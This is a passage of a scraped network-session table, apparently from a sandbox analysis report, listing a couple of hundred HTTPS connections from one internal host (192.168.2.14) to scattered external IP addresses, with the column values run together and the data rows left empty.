                                      17192192.168.2.1436038223.49.18.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17193192.168.2.1441228161.88.69.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17194192.168.2.143313298.163.162.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17195192.168.2.1455142220.166.252.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17196192.168.2.144574663.60.175.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17197192.168.2.1436668180.194.222.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17198192.168.2.143743620.255.1.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17199192.168.2.1456782144.64.40.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17200192.168.2.1448696159.154.187.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17201192.168.2.1450324118.227.120.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17202192.168.2.144166872.65.25.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17203192.168.2.145660892.22.75.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17204192.168.2.144005431.70.156.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17205192.168.2.1453576218.229.200.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17206192.168.2.1456250169.124.186.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17207192.168.2.145135835.244.58.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17208192.168.2.144077623.151.186.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17209192.168.2.145854089.37.134.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17210192.168.2.144289882.182.190.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17211192.168.2.146067294.167.66.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17212192.168.2.145157471.161.66.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17213192.168.2.1455958198.7.140.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17214192.168.2.14417662.96.69.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17215192.168.2.145796482.134.255.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17216192.168.2.1432906191.196.160.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17217192.168.2.1441152190.58.207.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17218192.168.2.143768059.48.214.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17219192.168.2.144279836.4.3.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17220192.168.2.145591477.211.66.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17221192.168.2.1442500160.165.166.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17222192.168.2.1454994220.98.78.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17223192.168.2.144498481.145.179.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17224192.168.2.1439738145.126.51.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17225192.168.2.144955638.244.92.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17226192.168.2.1440566135.92.30.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17227192.168.2.145964060.13.40.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17228192.168.2.143368269.178.13.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17229192.168.2.143502445.18.77.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17230192.168.2.1449086140.7.162.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17231192.168.2.145376844.7.254.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17232192.168.2.1442242211.166.17.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17233192.168.2.1458300139.219.151.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17234192.168.2.1443788200.214.212.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17235192.168.2.144664213.98.147.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17236192.168.2.145091497.161.97.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17237192.168.2.143783465.88.0.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17238192.168.2.145530851.33.221.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17239192.168.2.1453080119.75.248.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17240192.168.2.14443028.0.81.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17241192.168.2.144855637.212.15.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17242192.168.2.144165264.12.241.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17243192.168.2.145506480.143.50.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17244192.168.2.1433810186.20.215.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17245192.168.2.1444822126.191.156.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17246192.168.2.1432896216.24.92.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17247192.168.2.144296470.221.117.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17248192.168.2.1443234193.106.27.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17249192.168.2.1455144126.95.200.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17250192.168.2.1446082152.115.184.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17251192.168.2.1445304206.114.81.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17252192.168.2.144033081.83.209.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17253192.168.2.144324473.233.248.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17254192.168.2.144020059.169.86.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17255192.168.2.1454494119.233.162.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17256192.168.2.144093419.254.50.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17257192.168.2.1458574134.230.132.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17258192.168.2.144760675.32.94.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17259192.168.2.144528436.99.232.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17260192.168.2.1460056201.58.38.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17261192.168.2.1452124182.204.116.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17262192.168.2.1447664168.62.138.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17263192.168.2.145447286.58.239.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17264192.168.2.1451294191.203.173.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17265192.168.2.1434162173.38.59.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17266192.168.2.1455616111.61.139.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17267192.168.2.144750819.63.20.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17268192.168.2.143857887.34.168.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17269192.168.2.1443692108.248.45.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17270192.168.2.144610086.149.146.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17271192.168.2.14402422.143.113.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17272192.168.2.1452558177.11.223.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17273192.168.2.145171062.156.235.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17274192.168.2.145235224.109.240.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17275192.168.2.14588609.180.62.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17276192.168.2.1457612174.225.203.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17277192.168.2.1448390222.152.170.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17278192.168.2.1436576221.94.70.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17279192.168.2.146003073.234.167.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17280192.168.2.1433362154.11.140.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17281192.168.2.14465728.162.201.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17282192.168.2.1435050101.31.153.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17283192.168.2.1456354172.14.4.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17284192.168.2.1456758172.37.2.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17285192.168.2.1441932211.68.25.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17286192.168.2.1448912180.117.31.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17287192.168.2.1443570129.186.155.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17288192.168.2.14501608.147.237.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17289192.168.2.1437554172.140.241.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17290192.168.2.1455170150.133.12.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17291192.168.2.143290684.17.137.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17292192.168.2.1435186152.140.248.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17293192.168.2.1442560185.68.218.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17294192.168.2.144749891.100.174.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17295192.168.2.1440548115.195.205.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17296192.168.2.1440516106.209.232.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17297192.168.2.1448804118.188.76.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17298192.168.2.145630486.124.59.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17299192.168.2.1443392204.120.153.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17300192.168.2.145188461.112.213.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17301192.168.2.145530227.237.99.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17302192.168.2.1442194180.6.232.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17303192.168.2.1452506213.11.223.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17304192.168.2.144306069.119.28.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17305192.168.2.1440068130.182.170.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17306192.168.2.1438210102.42.155.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17307192.168.2.1440846207.94.149.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17308192.168.2.1447130180.102.176.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17309192.168.2.1456878221.25.125.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17310192.168.2.1450916182.135.197.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17311192.168.2.1438726204.83.74.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17312192.168.2.1449018132.77.123.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17313192.168.2.143345066.129.80.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17314192.168.2.1445204104.2.104.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17315192.168.2.14538721.183.140.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17316192.168.2.1459962130.169.235.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17317192.168.2.14360182.60.69.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17318192.168.2.1444754149.150.25.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17319192.168.2.1453894220.159.244.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17320192.168.2.14419825.29.155.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17321192.168.2.1437316213.153.235.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17322192.168.2.1459966210.114.119.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17323192.168.2.143858092.65.197.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17324192.168.2.144499641.94.32.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17325192.168.2.1446970131.131.187.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17326192.168.2.143973040.79.221.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17327192.168.2.1432968164.20.86.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17328192.168.2.145098441.159.225.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17329192.168.2.14434789.84.63.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17330192.168.2.1443108111.41.140.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17331192.168.2.143976885.58.127.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17332192.168.2.1433486115.186.82.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17333192.168.2.143929440.147.71.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17334192.168.2.1445828130.195.228.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17335192.168.2.143358212.66.98.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17336192.168.2.1452882115.243.221.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17337192.168.2.1458938194.171.196.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17338192.168.2.1445518112.33.121.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17339192.168.2.1452040168.68.213.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17340192.168.2.143344669.218.73.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17341192.168.2.1454264133.96.224.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17342192.168.2.1438012139.148.166.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17343192.168.2.144150679.166.220.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17344192.168.2.1435032159.5.227.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17345192.168.2.143577859.15.243.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17346192.168.2.1442844187.129.105.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17347192.168.2.145388298.22.139.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17348192.168.2.144469072.0.88.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17349192.168.2.145326862.195.105.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17350192.168.2.1442698221.137.63.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17351192.168.2.1448110134.197.77.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17352192.168.2.14495064.230.84.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17353192.168.2.1452642181.91.140.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17354192.168.2.1441990151.132.247.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17355192.168.2.143728461.165.168.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17356192.168.2.1453086198.33.250.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17357192.168.2.14548764.142.151.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17358192.168.2.1443142204.215.129.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17359192.168.2.1440244194.209.180.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17360192.168.2.144891243.76.28.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17361192.168.2.144800683.114.224.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17362192.168.2.1437510108.6.199.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17363192.168.2.1436394113.162.107.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17364192.168.2.145990275.79.28.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17365192.168.2.1433316200.97.0.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17366192.168.2.1452352126.77.160.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17367192.168.2.145695846.252.25.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17368192.168.2.1455904126.76.251.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17369192.168.2.144173696.247.240.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17370192.168.2.1446834173.140.109.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17371192.168.2.144657034.188.63.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17372192.168.2.1456062105.5.243.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17373192.168.2.145621457.34.164.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17374192.168.2.1455174105.167.76.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17375192.168.2.1436856108.196.105.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17376192.168.2.14367201.166.115.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17377192.168.2.1455648196.92.55.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17378192.168.2.143539493.46.146.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17379192.168.2.1460652108.84.214.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17380192.168.2.1447810163.60.186.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17381192.168.2.1460460217.120.230.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17382192.168.2.1448338109.150.225.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17383192.168.2.1452848152.220.118.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17384192.168.2.1446944146.42.163.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17385192.168.2.1448908172.204.125.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17386192.168.2.144674847.80.77.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17387192.168.2.1448354115.254.75.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17388192.168.2.1434728121.96.16.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17389192.168.2.1450920176.31.99.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17390192.168.2.1456608173.227.192.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17391192.168.2.1441958173.140.233.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17392192.168.2.143457819.246.83.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17393192.168.2.1457160128.251.239.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17394192.168.2.145618881.54.159.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17395192.168.2.144248464.170.151.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17396192.168.2.1457440199.51.203.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17397192.168.2.1450310187.81.156.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17398192.168.2.1448814171.61.160.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17399192.168.2.1433868173.205.194.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17400192.168.2.144238645.70.112.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17401192.168.2.1450838138.14.82.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17402192.168.2.143590274.203.158.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17403192.168.2.1433268147.248.75.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17404192.168.2.1449304159.190.70.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17405192.168.2.1433824196.221.233.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17406192.168.2.1460188133.41.248.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17407192.168.2.1447958143.72.174.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17408192.168.2.1460830144.210.159.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17409192.168.2.1448614213.153.124.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17410192.168.2.144927892.241.36.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17411192.168.2.1451836172.249.72.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17412192.168.2.1440872115.249.45.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17413192.168.2.143752865.209.66.147443
                                      TimestampBytes transferredDirectionData


